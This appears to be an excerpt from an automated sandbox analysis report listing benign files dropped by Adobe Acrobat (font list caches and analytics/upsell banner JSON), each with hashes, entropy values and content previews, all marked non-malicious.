                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PostScript document text
                                                                        Category:dropped
                                                                        Size (bytes):10880
                                                                        Entropy (8bit):5.214360287289079
                                                                        Encrypted:false
                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                        Malicious:false
                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7276

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PostScript document text
                                                                        Category:dropped
                                                                        Size (bytes):10880
                                                                        Entropy (8bit):5.214360287289079
                                                                        Encrypted:false
                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                        Malicious:false
                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):295
                                                                        Entropy (8bit):5.348247111710986
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJM3g98kUwPeUkwRe9:YvXKXgZfWvnZHGMbLUkee9
                                                                        MD5:3E4F34590C433130B5FB1C5599C5F643
                                                                        SHA1:681EB0BAC6AE0ABDBD27ADE339B25F59C9621EC2
                                                                        SHA-256:5BFC9559D93C1EC702C1600CA3AECF67A1CB18AB8452162D1A1D76FA3D4FB5FF
                                                                        SHA-512:FA384D354BBE8DAACC474306ECA1AECF20A22503542F6FCDB46673FEF7E0777437A3246542793053621DFA8FC835AC6BBAAF56E0DB9318327EF08758382A7C01
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.286043176404528
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJfBoTfXpnrPeUkwRe9:YvXKXgZfWvnZHGWTfXcUkee9
                                                                        MD5:A425993226520CFD6B353A53A3ADBFAB
                                                                        SHA1:05924017340FCACBE34DB600A3A7D0A4084F45F5
                                                                        SHA-256:ECD2456D96DCF560CF108D9FE5057B4141DE276882165053EAFDF746EFB69881
                                                                        SHA-512:FA70AB57629D3FDD51669378A746417002B197F989606643291A1FDA0FDD9460B2DFBEA7602FFA3AE5B69758F41D9BF0E1B60233E22015267243A2CDB5291031
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.265310970319197
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJfBD2G6UpnrPeUkwRe9:YvXKXgZfWvnZHGR22cUkee9
                                                                        MD5:0B5D11B05788AF7A1C81BC9EB9C93D96
                                                                        SHA1:69F2BE10DD8DC0CBA04D17F97188DDF94BBD4266
                                                                        SHA-256:2EA571C29676030E0DAF2E504823EAC9A4682BF210EA75CE0B42D156346208EF
                                                                        SHA-512:52AFD838592764CC4B6DCA014957639D74764880522849FAABDE5F61B85EA8537F2C0C3849328708BC9112F8C85409E708807BB5442C742EC35E35D6E356A6B0
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):285
                                                                        Entropy (8bit):5.327856499428617
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJfPmwrPeUkwRe9:YvXKXgZfWvnZHGH56Ukee9
                                                                        MD5:B5BA9B8B5F65AA2290765ED1B23B41AF
                                                                        SHA1:2B39DCB707F63439ED75DBECA1D98DCD03F30E46
                                                                        SHA-256:96C9FAA2AFC70226E4D743ACD626E7EF78D19D322DDD6FB942C73895CE236A7C
                                                                        SHA-512:4C7C11971DA5A9778E162D67552894B90E5CB1745FE787DB7A701E826ADD1C70970949CD07203609FA28B08ED85E977647C4988BCFA8CAE98C990CB4A2141FC1
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1123
                                                                        Entropy (8bit):5.688319970227485
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6XgZfoZMpLgE9cQx8LennAvzBvkn0RCmK8czOCCSU:YvlAZMhgy6SAFv5Ah8cv/U
                                                                        MD5:97ADF3504A8201C690D93B9707E99671
                                                                        SHA1:FBA2A90F1D60C1A914C7FB4BCB3A056D68717EDE
                                                                        SHA-256:2C0D33AEF23BDC03EBCB2336D113B6FFEC7266C42F848DC8759A6F27631A7AE2
                                                                        SHA-512:CA9380319A137DDA65E26CD03048FE60FEAD965E5493CFDA23F11912FB2BBACE7A82DC8BF05669AE047891A43853177FBBFF79DE9A246C674ED9EA86B5FBB98A
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.278130401927036
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJf8dPeUkwRe9:YvXKXgZfWvnZHGU8Ukee9
                                                                        MD5:93D964B4DE6820933201D0BE39D700AA
                                                                        SHA1:418927FD1377829465398419A209F6CE41672002
                                                                        SHA-256:59953F723FA050900601175A43C6F2DFB0715E869B32D3950D948C2795E939A0
                                                                        SHA-512:E525A65B754D742F8B5B467D01B4AD78FBAEF953FCE9D7222D07A38C1ACAB0CC18A4A02AD7108368CE5EFDC723C8438D40631B0580A04C3ABCB27188948C3294
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):5.276468631095964
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJfQ1rPeUkwRe9:YvXKXgZfWvnZHGY16Ukee9
                                                                        MD5:5013AF064B3EC97E2A36FB2A31AF5CB4
                                                                        SHA1:752AA1BCFF6319A21406B78B11438E30C6497218
                                                                        SHA-256:C00B3ECB998FD59CB4350562E21F026054B05AD7815B8F778E3C86DBF94B915F
                                                                        SHA-512:21B4235610E79AAA9BDBD5E003447B2A73BC289D322DF7B4944DAE2690E49FD0247FBC8A9BE1E20B779C45991AFC3D6159E667157BE6E85DFCFF649371DF6A3C
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.28954551567967
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJfFldPeUkwRe9:YvXKXgZfWvnZHGz8Ukee9
                                                                        MD5:49EAD7AAB2134344954603A20657D636
                                                                        SHA1:4B484D035DA6120EB2766C04C9C58462CABAF886
                                                                        SHA-256:E6ACD3E6DC47CB451E55AC8EBB58FFEE7FE6A071A369FF72DED7E706A7DC0142
                                                                        SHA-512:90CE18868CE8F105C081A8BCCF699A7A83168FF1C417E3E33DBBD6F2677002F3848B35F1FC0EC22784F63240F2B2CBB8C18BF4CDFD69F28CF313DF176C7E7DF4
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):295
                                                                        Entropy (8bit):5.3033326476894
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJfzdPeUkwRe9:YvXKXgZfWvnZHGb8Ukee9
                                                                        MD5:89291109DC26DBEC2B5EAC9F747BDE1A
                                                                        SHA1:CBBDC25AA45B8307F9E36A5FD43802895F4B7BE3
                                                                        SHA-256:0F37A82E9AE3C1CE54AE9AA402CFD99A6316E3DB07BF47FFDE5D86A8D97FC6F9
                                                                        SHA-512:8F39B00DFFFCB6B6F259CF0A16E207570C26C29F5859291978FE7A0557F1A62ABCF463B979A4BF785EBE54C37353C722DB62F17C823297B9D91D948E19E5D236
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.283643567489471
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJfYdPeUkwRe9:YvXKXgZfWvnZHGg8Ukee9
                                                                        MD5:C6224B893EE8471B29BD57058BCCF0E9
                                                                        SHA1:3875D88941788626D49A43F4A67757177B8AD949
                                                                        SHA-256:E183973C24756E0143CEB7D678D370B6FEBDCE8676942C96ED90CCD97DB8422A
                                                                        SHA-512:A4A153E1F3C0739FB71DAA5E34C0804137DD847A5346080D4728959587861E4C1369267A6419A95118D4F3D0079026510DA546B1B6880C801E6B1B76E748B121
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):284
                                                                        Entropy (8bit):5.269987328571704
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJf+dPeUkwRe9:YvXKXgZfWvnZHG28Ukee9
                                                                        MD5:60CC3A5C7CAA2F09D7E532E1A5E7EDB4
                                                                        SHA1:DD985847F037818AD23016217A05D463FF011A9D
                                                                        SHA-256:17F818DB2CA1F202D7A7D8ADA1686D723BBEEFA87E35704037D11A8B9E2EDE46
                                                                        SHA-512:42A96B431351F8B077B44000068942FAFFF9DB243B545963A0C433CEA17985CD252B75D6238029996D49C29C3CD7EFF07B5A2C6B93F41B466A81127D969E7C1A
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):291
                                                                        Entropy (8bit):5.267303080507049
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJfbPtdPeUkwRe9:YvXKXgZfWvnZHGDV8Ukee9
                                                                        MD5:05EF5EFAB8D93231263C52EF657D75F6
                                                                        SHA1:E4D4C20A9C1887A1E1AD5B026E406A71C539ACF4
                                                                        SHA-256:692535FBF1FADD9ADFACD02ACB4F41557AE61188D63B49889545CEAADF4FD7F8
                                                                        SHA-512:ACC167EF77F7505B4478E4D50599FE9A3D4AC24CB9734C38FB53EE37C8B0FE73850AC9AEAB4A05D1C31E1F569DAB15A41BF29726055533EBFCCF679B81F47170
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):287
                                                                        Entropy (8bit):5.266119632296221
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJf21rPeUkwRe9:YvXKXgZfWvnZHG+16Ukee9
                                                                        MD5:44C7FB10C4B52BB0F1FA53B9C879E77C
                                                                        SHA1:1E1ABE2CB84705F8DA1530BACC90F5FF1E4B1AD0
                                                                        SHA-256:33855F171A462C5D42FDBACC57CC1BEEE4935703B5604BED31E3E06BB9C87795
                                                                        SHA-512:3B64323D6144A23216F2AD1A0706F02D0283E1D37B6CCE3633261B48C0F6BE882A9CF3291C561FA381AB3FB2742B85EE7E4E11E6DF7BA5610B822364687172E8
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1090
                                                                        Entropy (8bit):5.665023730367492
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6XgZfoZ4amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSU:YvlAZ+BgkDMUJUAh8cvMU
                                                                        MD5:DC80DBC6E68F479C2F9C8EC3CEE17A2E
                                                                        SHA1:33175B2554DAE2CC6673D3B960F6E861C63F9C20
                                                                        SHA-256:5C887156E5C16516EE41204A255BDE2E04D666CE977EFDA205E842A8A452CE0D
                                                                        SHA-512:6D7EAD65413CF35CEA4A77335F2B174C4817DEA34FC0B0E7F5B42341C19DA230BBC52CB1A427375B12EF0F7CE36796426A6CA1559F488252FF1AB249DE37A4EE
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):286
                                                                        Entropy (8bit):5.240103786357541
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJfshHHrPeUkwRe9:YvXKXgZfWvnZHGUUUkee9
                                                                        MD5:287A139F75A03F5A54D3890FA557EC00
                                                                        SHA1:0FF61A4822329E00DDA491AC8AAAFD56CA58162B
                                                                        SHA-256:1AAD1DCFC46418C9B7660A8A7BB4266609CB844A9A7DAFF3B85AF7296C25C051
                                                                        SHA-512:6C5F605A54DAC57E62C10DC918DA457AA509D6C6EC28DD3DA5BF4882706C165F4CB93F2784F73E6FD68B1E5202E959504EDFEE9DFBAAE221B8824F415EDC39DD
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):282
                                                                        Entropy (8bit):5.256331009391887
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXgZfWHxHJNeQdhlzFkF0YvoAvJTqgFCrPeUkwRe9:YvXKXgZfWvnZHGTq16Ukee9
                                                                        MD5:045B0985A4F2EF052B4E81DBEF407843
                                                                        SHA1:2C86E43731BB5ED6B84317329C8C94853D42AE00
                                                                        SHA-256:495AFA8EFAC34AA1ECE0A473784985FFEDB758ABC3C5E4DE4B6D2D1DE6830501
                                                                        SHA-512:F8A8AC48623511CB707D6558B64A631C5231BAFC5BA0260F44EE36362A950EACACFFC4F446E0ADB36492544076BB72136C81C44CA3FB238C956AA41976A82182
                                                                        Malicious:false
